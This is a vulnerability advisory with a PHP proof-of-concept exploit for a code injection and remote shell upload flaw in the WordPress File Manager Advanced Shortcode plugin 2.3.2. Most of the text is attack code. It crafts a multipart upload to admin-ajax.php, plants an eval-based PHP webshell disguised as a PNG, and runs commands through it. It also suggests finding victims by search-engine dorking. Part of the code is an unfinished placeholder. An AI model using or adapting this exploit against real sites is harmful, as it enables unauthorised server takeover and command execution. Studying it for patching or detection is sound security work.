Headline
WordPress File Manager Advanced Shortcode 2.3.2 Code Injectin / Shell Upload
WordPress File Manager Advanced Shortcode plugin version 2.3.2 suffers from a code injection vulnerability that allows for remote shell upload.
=============================================================================================================================================| # Title : WordPress File Manager Advanced Shortcode 2.3.2 Code Injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) || # Vendor : https://advancedfilemanager.com/product/file-manager-advanced-shortcode-wordpress/ |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 106 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass MetasploitModule { private $targetUri; private $webshellName; private $wpData; private $uploadPath; private $postParam; private $getParam; public function __construct($targetUri, $webshell = null, $command = 'passthru') { $this->targetUri = $targetUri; $this->webshellName = $webshell ?: $this->generateRandomWebshellName(); $this->postParam = $this->generateRandomString(); $this->getParam = $this->generateRandomString(); } private function generateRandomWebshellName() { return bin2hex(random_bytes(rand(8, 16))) . '.php'; } private function generateRandomString($length = 8) { return bin2hex(random_bytes($length)); } private function getFormData($pngWebshell) { // Construct multipart form data $boundary = md5(time()); $formData = "--$boundary\r\n"; $formData .= "Content-Disposition: form-data; name=\"reqid\"\r\n\r\n\r\n"; $formData .= "--$boundary\r\n"; $formData .= "Content-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n"; $formData .= "--$boundary\r\n"; $formData .= "Content-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n"; $formData .= "--$boundary\r\n"; $formData .= "Content-Disposition: form-data; name=\"action\"\r\n\r\nfma_load_shortcode_fma_ui\r\n"; $formData .= "--$boundary\r\n"; $formData .= "Content-Disposition: form-data; name=\"_fmakey\"\r\n\r\n{$this->wpData['fmakey']}\r\n"; $formData .= "--$boundary\r\n"; $formData .= "Content-Disposition: form-data; name=\"path\"\r\n\r\n{$this->uploadPath}\r\n"; $formData .= "--$boundary\r\n"; $formData .= "Content-Disposition: form-data; name=\"upload[]\"; filename=\"{$this->webshellName}\"\r\n"; $formData .= "Content-Type: image/png, text/x-php\r\n\r\n" . $pngWebshell . "\r\n"; $formData .= "--$boundary--\r\n"; return ['data' => $formData, 'boundary' => $boundary]; } private function uploadWebshell($pngWebshell) { $formData = $this->getFormData($pngWebshell); $response = $this->sendRequest('POST', "/wp-admin/admin-ajax.php", $formData['data'], [ "Content-Type: multipart/form-data; boundary={$formData['boundary']}" ]); // Handle response and check for upload success $responseData = json_decode($response, true); if (isset($responseData['added'][0]['name']) && $responseData['added'][0]['name'] == $this->webshellName) { return true; } return false; } private function injectPhpPayloadPng($payload) { // Here you should inject PHP code into a PNG file // This is just a placeholder for the actual implementation return $payload; // Placeholder for the injected PNG } private function executeCommand($cmd) { $payload = base64_encode($cmd); $this->sendRequest('POST', "/{$this->wpData['baseurl']}/{$this->uploadPath}/{$this->webshellName}", [ $this->getParam => 'passthru', // replace with the command function $this->postParam => $payload ]); } private function sendRequest($method, $uri, $data, $headers = []) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $this->targetUri . $uri); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); if ($method == 'POST') { curl_setopt($ch, CURLOPT_POSTFIELDS, $data); } $response = curl_exec($ch); curl_close($ch); return $response; } public function exploit() { // Check for vulnerabilities and upload webshell logic $payload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>"; $pngWebshell = $this->injectPhpPayloadPng($payload); if ($this->uploadWebshell($pngWebshell)) { $this->executeCommand('whoami'); // Replace 'whoami' with your desired command } else { echo "Failed to upload webshell."; } }}// Usage example$exploit = new MetasploitModule('http://target-uri.com');$exploit->exploit();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================